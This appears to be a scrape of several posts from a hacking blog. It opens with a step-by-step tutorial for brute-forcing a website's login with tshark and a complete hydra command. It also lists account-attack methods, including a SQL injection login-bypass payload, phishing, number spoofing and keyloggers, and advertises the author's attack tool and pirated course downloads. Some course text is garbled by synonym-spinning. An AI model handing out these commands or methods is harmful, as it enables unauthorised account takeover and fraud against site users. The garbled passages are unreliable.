Hydra to bruteforce (duhh, Captain Obvious)
Tshark to sniff the packets and determine how we should input the command.
Tsu to initiate Tshark in root mode. You also need to have your phone rooted for this.

I will now give you a step-by-step tutorial and make it as verbose as possible. But first of all, you need to connect to a wifi. Don’t use your mobile data as it will NOT work and you have to use HTTP, not HTTPS because HTTPS encrypts the packet, giving you a hard time.

Step 1: Choose the website.
In this case, I will select:

Step 2: Look for the login page.
Once you located the login page, pay attention to the URL:

Step 3: Utilize Tshark.
This is a hard step because it requires swiftness and precision.

First of all, enter something, anything on the login page but do not press the login button yet. Instead, leave it there and go to your terminal

The following actions will require precision.

Then, go to the terminal, enter this command:
tsudo tshark -w sniff.pcap

Then, right after that, you have to go press the login button and wait for it to load, then go right back in and stop the capture with Ctrl-C.

Now, locate the packet that mentions something about HTTP. Then memorise it’s number.
Hint: The packet I talked about will look something like this:
56 1.531393847 → HTTP 881 POST /Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1 (application/x-www-form-urlencoded)
You gotta take note of that.

Now, enter this command but replace the highlighted ‘n‘ with the number of the packet that I told you to memorise.

tsudo tshark --color -VPxgWn2 -d tcp.port==1:65535,http -r sniff.pcap -a packets:n

Now you need to observe the packet. Go to the near end of the packet’s content and you should be able to see. For example, the highlighted part is the one you need to memorise:
HTML Form URL Encoded: application/x-www-form-urlencoded
Form item: "tfUName" = "boi"
Key: tfUName
Value: boi
Form item: "tfUPass" = "boi"
Key: tfUPass
Value: boi

Keep them in mind. This is crucial to the crack.

Step 4: Utilize Hydra.
The syntax for the command is:

My example credentials for the website logins are:
Username: IRISnoir
Password: extermux

For example, I have a file named wordlist.txt which contains:


The conditions met, now we just need to simply build the command and structure it carefully:
hydra -l IRISnoir -P wordlist.txt -e nsr -v -V http-post-form://"Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout"

I will explain how I input the highlighted part.

First, you just put the URL and add the double brackets like so:"Login.asp?RetURL=%2FDefault%2Easp%3F"

But replace the http or https in the URL with http-post-form.

Then remember what I told you to keep in mind? Yup, the two tfUName and tfUPass. They play a small yet big role in this if you know what I mean. Add it like what I am doing.

Finally, sprinkle a little piece of this and it’s done.

Now, you are pretty much done. If you wanna crack other websites, you need some little modifications in the command. But it’s not really hard, just take this tutorial as a base for that and you should be good to go.

I hope you enjoy this tutorial. If so, share it with your friend whom you think will be interested in. And remember, stay safe, stay ethical as Hackingarise is never responsible for any of your malicious deeds. Have a nice day.

Thursday, September 5, 2019

Top 5 ways to attack an account through Android

Hello everyone, this is IRISnoir from Hackingarise. Today I am back for another post. As you can see in the title, I will list and discuss about the top 5 ways to access another user’s account… just through your phone. Let’s get started, shall we?

Hacking A Rise top5

5. SQLi (SQL injection)

Ahh, the infamous vulnerability. Until now, it is still very common. SQLi is known to be one of the most dangerous vulnerabilities of all time. The exploitation process is NOT difficult nor long but the consequences will affect your system dearly. This involves breaching of accounts, extraction of sensitive information, etc.. You can imagine the chaos when a SQLi attack is successfully executed on a banking system. Probability of success: 51%.

Attack: Hackers will input a piece of code into the login page:
' or 1=1--
This will allow hackers to breach the accounts on a website that is vulnerable to SQLi.

Protect: SQLi is common, but it doesn’t mean that it’s unpreventable. To learn how to protect your system, read this article

4. Bruteforce/Dictionary attack

This is the act of using a login automator to attack accounts.

Now how this works is that it uses a wordlist file (a file containing a list of words) to try and guess the password of an account. Although, success is not guaranteed, if the password is not in the file you specified, then you’ll know you failed, this is a dictionary attack.

A bruteforce attack is almost similar to a dictionary attack where it guesses passwords. The only difference is that it will try ALL the password combinations and will eventually get the true password.

Attack: You just need the right software like Hydra. Then you’ll know what to do next.

Protect: Defending from this kind of attack is not hard but it’s also not easy. You can use Captcha or anything that can block the attacks of a machine and deploy it on your system.

3. Interacting with the target

Now, this is an old method, but as effective as always. This includes phishing, social engineering, shoulder surfing and basically everything you can do that involves meeting the target or interacting with them.

Attack: You can create a bogus ‘reset password site’ and send it to them and get them to input their sensitive data and have the data sent to you, a.k.a phishing.
Or you can just email them or call them (You have to spoof your number first if you wanna call, else you have to generate a bogus email for the sole purpose of doing this if you wanna use email.). And convince them somehow to ‘lend’ you their password, a.k.a social engineering.

Defend: Be alert, do NOT accept and download ANYTHING from untrusted sources or clicking on shady links. Even if they are enticing. Most importantly, don’t be gullible. Chances are, hackers will try to convince you to lend out your personal data. And, depending on the damage, the consequences ranges from sticky stuff to having your life ruined.

2. Malware

It involves the use of keyloggers and more softwares. Are you thinking what I’m thinking?

Attack: Malwares will deal damage dearly if crafted right. You can program one designated from basically annoying the victim to encrypting all files for ransom (ransomware), privacy breachers like keyloggers, destructor of PC, etc..

Defend: If you wanna see if it’s really malware, use it on a Virtual Machine. This will ensure your safety as you can dismiss the machine when all hells break loose.

Fun fact: You can actually build a keylogger in Python. Yes, very impressive. This is why I have it in this ‘Top 5’ list. Just install Termux and then you know what to do next.

1. Praying

Attack: You can try and learn about the target. Most people put their password as something related to their lives, for example: birthdate, pet’s name, etc.. If you succeed, then congratulations. If not, try the other methods.

Defend: Use something unexpected and hard to guess as your login credentials. If you want, you can input JIBBR JABBR like faewcg8cge88de8f87r6ug9g6if5e6t5t74i. Some people say that’s mad shit but you’ll thank me later and thank yourself later for reading this.

That’s about it for this ‘Top 5’ list. If you like what you’re reading, then share around. And remember, stay safe, stay ethical as Hackingarise is never responsible for any of your malicious acts. Have a nice day.

Also, check this out. This is a tool that I made. Show some love to it. If you want, you can use this with the tutorials. Again, don’t go too far as these are meant for educational purposes.

Monday, September 2, 2019

exHACK - the automator framework - IRISnoir

Hello everyone, this is IRISnoir from Hackingarise. Bringing to you another tutorial. This time about my hand-crafted tool: exHACK.

You will need these:
git to download my tool
python to activate the tool

First, you can clone it via:
git clone

Then you can just use:
python3 exHACK/

Then when it asks you for permission to install needed tools, just accept it.

And then you’re pretty much done. You have 5 tools. Just choose one and then follow all instructions and input everything that it says. It’s very easy. Even a n00b can do it.

exHACK is a tool made with love by me. I hope that you will enjoy it as much as I enjoy making it. If you like what you are reading, why not share it around. And remember, stay safe, stay ethical. Have a nice day!

Sunday, September 1, 2019

Complete Ethical Hacking Tools in Kali Linux Course – Learn Kali Linux

Welcome to hacking a rise Im the laughing man this post is of a course the tools of kali linux

What you’ll learn
Complete Ethical Hacking Tools in Kali Linux Course – Learn Kali Linux

Perform basic to advanced tasks in Kali Linux
Configure services and turn your Kali Linux into a server
Complete ethical hacking tasks from Kali Linux
Network Hacking and Security
Wifi hacking and Security
Dos and DDoS attacks
Understand how Linux commands can be used by hackers
Perform basic to advanced tasks in Kali Linux
Hack your way through multiple customized targets
Build your own penetration testing lab environment
Discover vulnerabilities in web applications automatically and manually
How to install and use Kali Linux
Password cracking
Web attacks
Wireless cracking
Denial-of-service (DoS) attacks
Internet connection
This is a 100% practical based course, with Intellectual theory. You’ll learn the most advanced Ethical Hacking tools.
Installing Kali Linux is practical as it provides more options to work with combine tools.
This course gives a complete understanding of Kali Linux and explains how to use it in defense Security.

All of the resources to build the labs are free.
It will definitely be a plus if you are familiar with the basic concepts of any Linux operating system.

What skills will you gain?

Perform basic to advanced tasks in Kali Linux
Configure services and turn your Kali Linux into a server
Complete ethical hacking tasks from Kali Linux
Network Hacking and Security
Wifi hacking and Security
Dos and DDoS attacks
Understand how Linux commands can be used by hackers
Many more
Features of Kali Linux:

Open source Git tree
Wide-ranging wireless device support
Custom kernel, patched for injection
Developed in a secure environment
GPG signed packages and repositories
Multi-language support
Completely customizable
Advantages of Kali Linux:

Single user, root access by design
Network services disabled by default
A minimal and trusted set of repositories
Who this course is for:
IT Engineers
Ethical hackers
Network Administrators and Operators
Security policymakers
Content From:

Penetration Testing with KALI
size 4.13 gb
Download here

Building hacking tools from scratch in python3

welcome to hacking a rise in this post we share a course to learn you how to make your own tools in python as a pentester you will need to know this dont forget to donate to us to support are blog

Constructing customized hacking instruments

Created by Alex Thomas
Final up to date 10/2018
English [Auto-generated]
What you’ll be taught

Construct customized arsenal of hacking instruments
Velocity up time it takes to profitable hack a goal
Perceive different hacking instruments on a deep stage
Use information realized to create extra instruments
Be capable of program in python
Perceive primary safety methods
Primary understanding of linux

When different’s instruments fail, writing your personal makes you a real penetration tester!


Earlier than You Enroll !

The information which you’ll be taught from this course is actually a weapon. My aim is to make you a greater warrior in penetration testing. Take into account the results of your actions, be good and don’t go to jail.

There are fairly lots of people who name themselves hackers however in actuality few have the strong expertise to suit the definition, when different’s instruments fail, writing your personal makes you a real hacker!

Who this course is for:
Newbie programers and hackers. When you’ve got by no means programed in python you shouldn’t take this course.
Measurement: 340MB